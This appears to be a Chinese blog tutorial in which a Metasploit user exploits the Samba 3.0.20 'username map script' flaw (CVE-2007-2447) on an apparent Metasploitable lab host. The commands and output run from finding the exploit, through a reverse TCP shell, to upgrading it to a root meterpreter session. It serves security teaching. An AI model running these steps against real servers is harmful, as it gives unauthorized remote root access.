0x04-1 服务器端exploitation-Samba 3.
2018-12-05 本文已影响0人
Gatociego
侵入一个linux服务器
msf > services -c port,info -p 135,445
Services
========
host port info
---- ---- ----
192.168.10.122 135 Microsoft Windows RPC
192.168.10.122 445 Windows 2003 (build:3790) (name:ROOT-TVI862UBEH) (workgroup:WORKGROUP )
192.168.10.128 135 Microsoft Windows RPC
192.168.10.128 445 Windows XP SP3 (language:English) (name:DH-CA8822AB9589) (workgroup:WORKGROUP )
192.168.10.254 445 Unix (Samba 3.0.20-Debian)
# 现在192.168.10.254这台服务器
到 https://www.cvedetails.com 查看Samba 3.0.20-Debian有没有对应cve编码
# 搜索对应的漏洞利用exploit
msf > search cve:2007 type:exploit samba
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow
exploit/multi/samba/usermap_script 2007-05-14 excellent Samba "username map script" Command Execution
exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow
# 选择 rank为excellent,成功率大一些
msf > use exploit/multi/samba/usermap_script
# 查看该exploit详细的信息
msf exploit(multi/samba/usermap_script) > info
Name: Samba "username map script" Command Execution
Module: exploit/multi/samba/usermap_script
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2007-05-14
Provided by:
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.10.254 yes The target address
RPORT 139 yes The target port (TCP)
Payload information:
Space: 1024
Description:
This module exploits a command execution vulnerability in Samba
versions 3.0.20 through 3.0.25rc3 when using the non-default
"username map script" configuration option. By specifying a username
containing shell meta characters, attackers can execute arbitrary
commands. No authentication is needed to exploit this vulnerability
since this option is used to map usernames prior to authentication!
References:
https://cvedetails.com/cve/CVE-2007-2447/
OSVDB (34700)
http://www.securityfocus.com/bid/23972
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
http://samba.org/samba/security/CVE-2007-2447.html
# 设置参数并执行
msf exploit(multi/samba/usermap_script) > set rhost 192.168.10.254
rhost => 192.168.10.254
msf exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP double handler on 192.168.10.115:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo EPsE8hpgZPCxacgE;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "EPsE8hpgZPCxacgE\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.10.115:4444 -> 192.168.10.254:58722) at 2018-12-05 18:09:12 +0800
# 这里就获取了一个session,执行一个命令
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:7f:de:bf
inet addr:10.10.10.254 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe7f:debf/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:38716 errors:0 dropped:0 overruns:0 frame:0
TX packets:547 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2543677 (2.4 MB) TX bytes:72178 (70.4 KB)
Interrupt:17 Base address:0x2000
eth1 Link encap:Ethernet HWaddr 00:0c:29:7f:de:c9
inet addr:192.168.10.254 Bcast:192.168.10.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe7f:dec9/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:47084 errors:1 dropped:1 overruns:0 frame:0
TX packets:9312 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3330608 (3.1 MB) TX bytes:1689578 (1.6 MB)
Interrupt:18 Base address:0x2080
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:4956 errors:0 dropped:0 overruns:0 frame:0
TX packets:4956 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2376272 (2.2 MB) TX bytes:2376272 (2.2 MB)
# 退出session,并不是关闭session
Ctrl + Z
^Z
Background session 1? [y/N] y
msf exploit(multi/samba/usermap_script) >
# 查看 sessions的使用手册
msf exploit(multi/samba/usermap_script) > sessions -h
Usage: sessions [options] or sessions [id]
Active session manipulation and interaction.
OPTIONS:
-C <opt> Run a Meterpreter Command on the session given with -i, or all
-K Terminate all sessions
-S <opt> Row search filter.
-c <opt> Run a command on the session given with -i, or all
-d List all inactive sessions
-h Help banner
-i <opt> Interact with the supplied session ID
-k <opt> Terminate sessions by session ID and/or range
-l List all active sessions
-n <opt> Name or rename a session by ID
-q Quiet mode
-s <opt> Run a script or module on the session given with -i, or all
-t <opt> Set a response timeout (default: 15)
-u <opt> Upgrade a shell to a meterpreter session on many platforms
-v List all active sessions in verbose mode
-x Show extended information in the session table
Many options allow specifying session ranges using commas and dashes.
For example: sessions -s checkvm -i 1,3-5 or sessions -k 1-2,5,6
# 直接执行sessions,查看当前所有可使用的sessions
msf exploit(multi/samba/usermap_script) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.168.10.115:4444 -> 192.168.10.254:58722 (192.168.10.254)
# 连接一个session
msf exploit(multi/samba/usermap_script) > sessions -i 1
[*] Starting interaction with 1...
# 关闭session
Crtl + C
^C
Abort session 1? If not, the foreground process in the session will be killed [y/N] y
""
[*] 192.168.10.254 - Command shell session 1 closed. Reason: User exit
关于payload
攻击负载
exploit 就像一把钥匙,打开一个门,打开门之后的行为就需要payload
执行 show payload,默认情况msf会自动选择一个payload
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.10.115 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
默认使用的是cmd/unix/reverse 就是通过4444端口反弹一个shell,一般情况下这个shell的功能有限,需要将这个shell升级为meterpreter session
# 通过指令升级shell
sessions -u session_id
msf exploit(multi/samba/usermap_script) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]
[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.10.115:4433
[*] Sending stage (861480 bytes) to 192.168.10.254
[*] Meterpreter session 2 opened (192.168.10.115:4433 -> 192.168.10.254:42658) at 2018-12-05 18:20:07 +0800
[*] Command stager progress: 100.00% (773/773 bytes)
# 查看sessions
msf exploit(multi/samba/usermap_script) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell cmd/unix 192.168.10.115:4444 -> 192.168.10.254:39390 (192.168.10.254)
2 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain 192.168.10.115:4433 -> 192.168.10.254:42658 (192.168.10.254)